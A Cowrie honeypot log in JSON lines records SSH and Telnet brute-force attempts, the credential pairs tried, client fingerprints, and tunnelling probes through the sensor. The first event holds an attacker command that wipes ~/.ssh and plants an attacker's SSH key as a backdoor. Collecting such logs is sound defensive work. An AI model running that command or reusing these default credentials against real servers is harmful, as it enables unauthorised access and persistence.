{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T07:39:53.006419Z","src_ip":"212.227.235.229","session":"01ef1483bb74"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T07:39:53.188237Z","src_ip":"212.227.235.229","session":"01ef1483bb74"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:39:53.189222Z","src_ip":"212.227.235.229","session":"01ef1483bb74"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49105,"dst_ip":"1.2.3.4","dst_port":22,"session":"f3a133418916","protocol":"ssh","message":"New connection: 212.227.235.229:49105 (1.2.3.4:22) [session: f3a133418916]","sensor":"my-vps","timestamp":"2025-08-31T07:39:53.351502Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T07:39:53.367231Z","src_ip":"212.227.235.229","session":"f3a133418916"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T07:39:53.579370Z","src_ip":"212.227.235.229","session":"f3a133418916"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:39:59.000380Z","src_ip":"79.127.48.196","session":"1c2dea642a18"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T07:39:59.002134Z","src_ip":"79.127.48.196","session":"1c2dea642a18"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T07:40:01.583926Z","src_ip":"212.227.235.229","session":"f3a133418916"}
{"eventid":"cowrie.session.closed","duration":"9.7","message":"Connection lost after 9.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:40:03.038463Z","src_ip":"212.227.235.229","session":"f3a133418916"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52615,"dst_ip":"1.2.3.4","dst_port":22,"session":"02c77e4b1075","protocol":"ssh","message":"New connection: 212.227.235.229:52615 (1.2.3.4:22) [session: 02c77e4b1075]","sensor":"my-vps","timestamp":"2025-08-31T07:40:03.203233Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T07:40:03.635238Z","src_ip":"212.227.235.229","session":"02c77e4b1075"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T07:40:03.798922Z","src_ip":"212.227.235.229","session":"02c77e4b1075"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T07:40:16.594542Z","src_ip":"212.227.235.229","session":"02c77e4b1075"}
{"eventid":"cowrie.session.closed","duration":"38.1","message":"Connection lost after 38.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:40:16.886592Z","src_ip":"212.227.235.229","session":"01ef1483bb74"}
{"eventid":"cowrie.session.closed","duration":"13.7","message":"Connection lost after 13.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:40:16.887602Z","src_ip":"212.227.235.229","session":"02c77e4b1075"}
{"eventid":"cowrie.session.connect","src_ip":"102.210.148.92","src_port":48796,"dst_ip":"1.2.3.4","dst_port":22,"session":"cc1700fc8034","protocol":"ssh","message":"New connection: 102.210.148.92:48796 (1.2.3.4:22) [session: cc1700fc8034]","sensor":"my-vps","timestamp":"2025-08-31T07:40:17.106587Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T07:40:17.107592Z","src_ip":"102.210.148.92","session":"cc1700fc8034"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T07:40:17.274071Z","src_ip":"102.210.148.92","session":"cc1700fc8034"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"dell@2020","message":"login attempt [postgres/dell@2020] failed","sensor":"my-vps","timestamp":"2025-08-31T07:40:17.979163Z","src_ip":"102.210.148.92","session":"cc1700fc8034"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:40:19.147954Z","src_ip":"102.210.148.92","session":"cc1700fc8034"}
{"eventid":"cowrie.login.success","username":"root","password":"Magic123","message":"login attempt [root/Magic123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T07:40:28.129784Z","src_ip":"79.127.48.196","session":"1c2dea642a18"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T07:40:55.750253Z","src_ip":"79.127.48.196","session":"1c2dea642a18"}
{"eventid":"cowrie.command.input","input":"ssh -V","message":"CMD: ssh -V","sensor":"my-vps","timestamp":"2025-08-31T07:40:55.750966Z","src_ip":"79.127.48.196","session":"1c2dea642a18"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/8737483f9dc335904b0dacf8467784c20ab36ded9ac9b78bd025cc0566b8caff","size":58,"shasum":"8737483f9dc335904b0dacf8467784c20ab36ded9ac9b78bd025cc0566b8caff","duplicate":true,"duration":"12.8","message":"Closing TTY Log: var/lib/cowrie/tty/8737483f9dc335904b0dacf8467784c20ab36ded9ac9b78bd025cc0566b8caff after 12.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:41:08.517119Z","src_ip":"79.127.48.196","session":"1c2dea642a18"}
{"eventid":"cowrie.session.closed","duration":"98.8","message":"Connection lost after 98.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:41:21.343286Z","src_ip":"79.127.48.196","session":"1c2dea642a18"}
{"eventid":"cowrie.session.connect","src_ip":"102.210.148.92","src_port":37864,"dst_ip":"1.2.3.4","dst_port":22,"session":"6bb2a7605ff4","protocol":"ssh","message":"New connection: 102.210.148.92:37864 (1.2.3.4:22) [session: 6bb2a7605ff4]","sensor":"my-vps","timestamp":"2025-08-31T07:41:33.132093Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T07:41:33.132940Z","src_ip":"102.210.148.92","session":"6bb2a7605ff4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T07:41:33.311936Z","src_ip":"102.210.148.92","session":"6bb2a7605ff4"}
{"eventid":"cowrie.login.failed","username":"moodle","password":"1qaz!QAZ","message":"login attempt [moodle/1qaz!QAZ] failed","sensor":"my-vps","timestamp":"2025-08-31T07:41:34.071067Z","src_ip":"102.210.148.92","session":"6bb2a7605ff4"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:41:35.253087Z","src_ip":"102.210.148.92","session":"6bb2a7605ff4"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":13328,"dst_ip":"1.2.3.4","dst_port":22,"session":"1ab429a65192","protocol":"ssh","message":"New connection: 77.83.207.83:13328 (1.2.3.4:22) [session: 1ab429a65192]","sensor":"my-vps","timestamp":"2025-08-31T07:41:48.857525Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T07:41:48.858568Z","src_ip":"77.83.207.83","session":"1ab429a65192"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T07:41:48.908843Z","src_ip":"77.83.207.83","session":"1ab429a65192"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T07:41:49.159185Z","src_ip":"77.83.207.83","session":"1ab429a65192"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":4051,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:4051","sensor":"my-vps","timestamp":"2025-08-31T07:41:49.210202Z","session":"1ab429a65192"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T07:41:49.260519Z","src_ip":"77.83.207.83","session":"1ab429a65192"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":15838,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:15838","sensor":"my-vps","timestamp":"2025-08-31T07:41:49.404602Z","session":"1ab429a65192"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T07:41:49.454859Z","src_ip":"77.83.207.83","session":"1ab429a65192"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":21661,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:21661","sensor":"my-vps","timestamp":"2025-08-31T07:41:49.596736Z","session":"1ab429a65192"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T07:41:49.647413Z","src_ip":"77.83.207.83","session":"1ab429a65192"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:41:49.698741Z","src_ip":"77.83.207.83","session":"1ab429a65192"}
{"eventid":"cowrie.session.connect","src_ip":"31.208.53.4","src_port":55304,"dst_ip":"1.2.3.4","dst_port":23,"session":"763e7ee8c21b","protocol":"telnet","message":"New connection: 31.208.53.4:55304 (1.2.3.4:23) [session: 763e7ee8c21b]","sensor":"my-vps","timestamp":"2025-08-31T07:43:19.027095Z"}
{"eventid":"cowrie.session.closed","duration":14.381513833999634,"message":"Connection lost after 14 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:43:33.408525Z","src_ip":"31.208.53.4","session":"763e7ee8c21b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":28051,"dst_ip":"1.2.3.4","dst_port":22,"session":"11db3e89617d","protocol":"ssh","message":"New connection: 212.227.125.160:28051 (1.2.3.4:22) [session: 11db3e89617d]","sensor":"my-vps","timestamp":"2025-08-31T07:44:00.455394Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T07:44:00.456411Z","src_ip":"212.227.125.160","session":"11db3e89617d"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T07:44:00.536874Z","src_ip":"212.227.125.160","session":"11db3e89617d"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa11223344","message":"login attempt [root/Aa11223344] succeeded","sensor":"my-vps","timestamp":"2025-08-31T07:44:00.948343Z","src_ip":"212.227.125.160","session":"11db3e89617d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"81.19.77.166","dst_port":587,"src_ip":"212.227.125.160","src_port":22,"message":"direct-tcp connection request to 81.19.77.166:587 from 127.0.0.1:22","sensor":"my-vps","timestamp":"2025-08-31T07:44:01.032072Z","session":"11db3e89617d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"81.19.77.166","dst_port":587,"data":"b'E'","id":0,"message":"discarded direct-tcp forward request 0 to 81.19.77.166:587 with data b'E'","sensor":"my-vps","timestamp":"2025-08-31T07:44:01.112544Z","src_ip":"212.227.125.160","session":"11db3e89617d"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:44:01.194621Z","src_ip":"212.227.125.160","session":"11db3e89617d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32838,"dst_ip":"1.2.3.4","dst_port":23,"session":"ac32b7e328e8","protocol":"telnet","message":"New connection: 212.227.235.229:32838 (1.2.3.4:23) [session: ac32b7e328e8]","sensor":"my-vps","timestamp":"2025-08-31T07:44:12.581620Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-31T07:44:13.054024Z","src_ip":"212.227.235.229","session":"ac32b7e328e8"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-31T07:44:14.525338Z","src_ip":"212.227.235.229","session":"ac32b7e328e8"}
{"eventid":"cowrie.session.closed","duration":2.681300640106201,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:44:15.262853Z","src_ip":"212.227.235.229","session":"ac32b7e328e8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50452,"dst_ip":"1.2.3.4","dst_port":23,"session":"270b0b4c2d76","protocol":"telnet","message":"New connection: 212.227.235.229:50452 (1.2.3.4:23) [session: 270b0b4c2d76]","sensor":"my-vps","timestamp":"2025-08-31T07:44:15.468470Z"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-31T07:44:15.978098Z","src_ip":"212.227.235.229","session":"270b0b4c2d76"}
